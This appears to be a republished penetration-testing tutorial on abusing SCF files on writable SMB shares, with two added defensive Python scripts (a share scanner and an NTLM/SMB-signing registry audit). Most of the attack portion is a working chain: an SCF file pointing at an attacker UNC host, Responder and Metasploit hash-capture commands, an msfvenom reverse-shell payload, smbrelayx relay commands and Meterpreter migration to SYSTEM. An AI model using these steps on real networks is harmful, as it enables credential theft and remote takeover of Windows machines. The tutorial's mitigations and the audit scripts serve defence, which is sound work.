2025-01-24 Update From: SLTechnology News&Howtos
Shulou(Shulou.com) 05/31 Report--
How can SCF files be used to build a network penetration? This article walks through the analysis and the corresponding solutions in detail, in the hope of giving readers who want to solve this problem a simple and feasible method.
SMB is a network protocol widely used for file sharing in enterprise organizations. In internal penetration tests it is not uncommon to find shared files that contain sensitive information such as plaintext passwords and database connection strings. However, even when a file share contains no data that could be used to connect to other systems, if unauthenticated users have write access to the share, an attacker can still obtain the password hashes of domain users, or a Meterpreter shell.
Collecting hashes
SCF (Shell Command File) files can be used to perform a limited set of operations, such as showing the Windows desktop or opening Windows Explorer, which is nothing new. However, an SCF file can also be made to reference a specific UNC path, which lets penetration testers build an attack on it. The following content is placed in a text file, which then has to be dropped onto the network share.
[Shell]
Command=2
IconFile=\\X.X.X.X\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
Contents of the SCF file
Save pentestlab.txt with the .scf extension; the file is processed as soon as a user browses the share. Prefixing the file name with the @ symbol places @pentestlab.scf at the top of the share's file listing.
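From the defender's side, the same SCF structure shown above is what a share audit has to look for: an IconFile entry that resolves to a UNC path on a host that is not one of your file servers. The following scanner is an added example, not code from the original article. It walks a directory tree (for example a mounted share), parses SCF files, and reports any IconFile pointing at an untrusted UNC host; it also flags the '@' prefix trick described above. It goes slightly beyond the article by treating .url files the same way, since they use the same INI-style format with an IconFile key. The share contents, the IP address and the trusted-host list in the demo are constructed.

```python
"""Scan a directory tree (for example a mounted SMB share) for SCF and .url
files whose IconFile points at an untrusted UNC host.
Added example, not part of the original article; the share contents,
IP address and trusted-host list used in the demo are constructed."""
import os
import re
import tempfile

# UNC path: \\host\share\... (Windows also accepts forward slashes)
UNC_RE = re.compile(r"^\s*[\\/]{2}([^\\/]+)(?:[\\/]|$)")


def parse_ini_like(text):
    """Return a list of (section, key, value) tuples from INI-style text.
    SCF and .url files use this format; keys are normalised to lower case."""
    entries = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            entries.append((section, key.strip().lower(), value.strip()))
    return entries


def find_unc_icon(text, trusted_hosts=()):
    """Return the untrusted UNC host referenced by an IconFile entry, or None."""
    trusted = {h.lower() for h in trusted_hosts}
    for _section, key, value in parse_ini_like(text):
        if key != "iconfile":
            continue
        m = UNC_RE.match(value)
        if m and m.group(1).lower() not in trusted:
            return m.group(1)
    return None


def scan_share(root, trusted_hosts=()):
    """Walk `root` and report shortcut files that reference an untrusted UNC host.
    Returns a list of dicts with path, referenced host and reason."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in (".scf", ".url"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    host = find_unc_icon(fh.read(), trusted_hosts)
            except OSError:
                continue  # unreadable file: skip, do not abort the scan
            if host is None:
                continue
            reason = "IconFile references UNC host"
            if name.startswith("@"):
                reason += "; '@' prefix sorts it to the top of the listing"
            findings.append({"path": path, "host": host, "reason": reason})
    return findings


def demo():
    """Build a constructed share with one suspicious and one benign SCF file."""
    root = tempfile.mkdtemp(prefix="share_demo_")
    # Same layout as the SCF in the article; 203.0.113.10 is a constructed address.
    bad = ("[Shell]\nCommand=2\nIconFile=\\\\203.0.113.10\\share\\pentestlab.ico\n"
           "[Taskbar]\nCommand=ToggleDesktop\n")
    # A local icon path, as a legitimate "Show Desktop" shortcut would use.
    good = ("[Shell]\nCommand=2\nIconFile=C:\\Windows\\explorer.exe,1\n"
            "[Taskbar]\nCommand=ToggleDesktop\n")
    with open(os.path.join(root, "@pentestlab.scf"), "w") as fh:
        fh.write(bad)
    with open(os.path.join(root, "Show Desktop.scf"), "w") as fh:
        fh.write(good)
    return scan_share(root, trusted_hosts=["fileserver01"])


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: {f['reason']} ({f['host']})")
```

Run it against the mount point of each writable share; anything it reports that is not in the trusted-host list is worth removing and investigating, and a scheduled run of the same check is a cheap way to notice when such a file appears.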
SCF file
Responder needs to be run with the following parameters to capture the hash of the user who browses the share.
Responder -wrf --lm -v -I eth0
Parameters of Responder-SCF
When the user browses the share, a network connection is automatically established from their system to the UNC path contained in the SCF file, and Windows attempts to authenticate to that share with the user's username and password. During authentication a random 8-byte challenge is sent from the server to the client, and the NTLM/LANMAN password hash is encrypted with that challenge. Responder captures the resulting NTLMv2 hash.
Responder-NTLMv2 hash crawled through SCF
Besides Responder, the Metasploit Framework also has a module that can be used to capture challenge-response password hashes from SMB clients.
auxiliary/server/capture/smb
Metasploit-the module that captures SMB
As before, when a user browses the same share, his password hash will be captured by Metasploit.
Metasploit-capture NTLMv2
If the company's password policy is weak enough, an attacker may need only days or weeks to crack the captured password hash.
Meterpreter Shell
The main advantage of the technique above is that it requires no user interaction: users are automatically forced to connect to the share, at which point the NTLMv2 challenge-response takes place. The technique can therefore also be combined with an SMB relay, which delivers a payload that returns a Meterpreter shell from every user who accesses the share.
MSFVenom can be used to generate a payload that will be executed on the target:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.171 LPORT=5555 -f exe > pentestlab.exe
MSFVenom-payload generated for SMB relay
Core Security has released a collection of Python classes called Impacket that can perform various attacks against Windows protocols such as SMB. The Python script smbrelayx sets up a relay attack and serves a payload when the target host tries to connect to the SMB server. This happens automatically, because the SCF file forces every user to connect to the non-existent share with their own credentials.
./smbrelayx.py -h Target-IP -e ./pentestlab.exe
Impacket-SMB relay server
The Metasploit Framework handler is needed to receive the connection once pentestlab.exe is executed on the target.
exploit/multi/handler
The module needs to be configured with the same parameters as the generated payload.
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
set LPORT 5555
exploit
Metasploit - multi/handler module
When the user browses the share, the SMB server receives the connection, authenticates to the user's system with the relayed username and password hash, drops the payload on a writable share and executes it.
Impacket-SMB relay attack
Meterpreter will receive a session. But to avoid losing connections, it is necessary to migrate to a more stable process.
Meterpreter-lists the running processes
Use the migrate command with the process ID.
Meterpreter-process migration
In this example, process 1600 corresponds to a svchost.exe process running with SYSTEM privileges.
Meterpreter-list of migration processes
Running getuid from the Meterpreter console will get the current UID, which is now SYSTEM.
Meterpreter-retrieve the current UID
The Metasploit Framework can also perform the same attack.
exploit/windows/smb/smb_relay
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
exploit
Metasploit-SMB relay module
The SMB server establishes a connection and authenticates to the target with the relayed username and password hash, drops the payload on a writable share, executes it as a service with the user's rights, performs cleanup, and returns a Meterpreter session.
Metasploit-SMB relay attack
You can use the sessions command to interact with an existing session.
Metasploit-SMB relay session
This technique takes advantage of something common to almost every network, file shares, to retrieve password hashes and obtain a Meterpreter shell. The only requirement is that a user browses the share containing the malicious SCF file. These attacks can, however, be prevented by doing the following:
Use Kerberos authentication and SMB signing
Do not allow unauthenticated users write permissions on file shares
Make sure NTLMv2 password hashes are used instead of LanMan
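The second and third mitigations in the list above (SMB signing, NTLMv2 instead of LanMan) correspond to concrete host settings that can be audited. The following is an added example, not code from the original article: it evaluates a snapshot of the relevant Windows registry values against those mitigations and lists what is missing. The registry keys and value names are the standard ones (LmCompatibilityLevel under the Lsa key, RequireSecuritySignature under the LanmanServer and LanmanWorkstation parameters); the snapshot used in the demo is constructed, and on a Windows host the script reads the live values instead.

```python
"""Audit the host settings behind two of the mitigations listed above:
SMB signing and NTLMv2-only authentication.
Added example, not from the original article. Registry paths and value
names are the standard Windows ones; the demo snapshot is constructed."""
import sys

LSA = r"SYSTEM\CurrentControlSet\Control\Lsa"
SRV = r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
WKS = r"SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters"

# (registry key under HKLM, value name, pass condition, description)
CHECKS = [
    (LSA, "LmCompatibilityLevel", lambda v: v is not None and v >= 3,
     "send NTLMv2 responses only (level 3+; level 5 also refuses LM/NTLM)"),
    (SRV, "RequireSecuritySignature", lambda v: v == 1,
     "SMB server requires signing"),
    (WKS, "RequireSecuritySignature", lambda v: v == 1,
     "SMB client requires signing"),
]


def audit_ntlm_settings(values):
    """`values` maps (key, name) -> DWORD, or None when the value is absent.
    An absent value is reported as a failure so that it gets set explicitly
    by policy rather than left to the OS default.
    Returns a list of (key, name, current, description) for failing checks."""
    failures = []
    for key, name, passes, desc in CHECKS:
        current = values.get((key, name))
        if not passes(current):
            failures.append((key, name, current, desc))
    return failures


def read_live_values():
    """Read the same values from the local registry (Windows only)."""
    import winreg  # standard library on Windows, absent elsewhere
    out = {}
    for key, name, _passes, _desc in CHECKS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
                out[(key, name)] = winreg.QueryValueEx(k, name)[0]
        except OSError:
            out[(key, name)] = None
    return out


# Constructed snapshot of a weak host: LM/NTLM still sent, server signing off.
WEAK_SNAPSHOT = {
    (LSA, "LmCompatibilityLevel"): 1,
    (SRV, "RequireSecuritySignature"): 0,
    (WKS, "RequireSecuritySignature"): 1,
}

# Constructed snapshot of a host that satisfies all three checks.
HARDENED_SNAPSHOT = {
    (LSA, "LmCompatibilityLevel"): 5,
    (SRV, "RequireSecuritySignature"): 1,
    (WKS, "RequireSecuritySignature"): 1,
}

if __name__ == "__main__":
    vals = read_live_values() if sys.platform == "win32" else WEAK_SNAPSHOT
    for key, name, cur, desc in audit_ntlm_settings(vals):
        print(f"FAIL HKLM\\{key}\\{name}={cur}: {desc}")
```

The first mitigation in the list, Kerberos, is not a single registry flag and is not covered here; the point of the audit is that relay and hash capture both depend on unsigned NTLM traffic, so signing and a sufficient LmCompatibilityLevel are the settings to verify on every server and workstation.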
That is the answer to the question of how SCF files can be used to build a network penetration. I hope the content above has been of some help to you.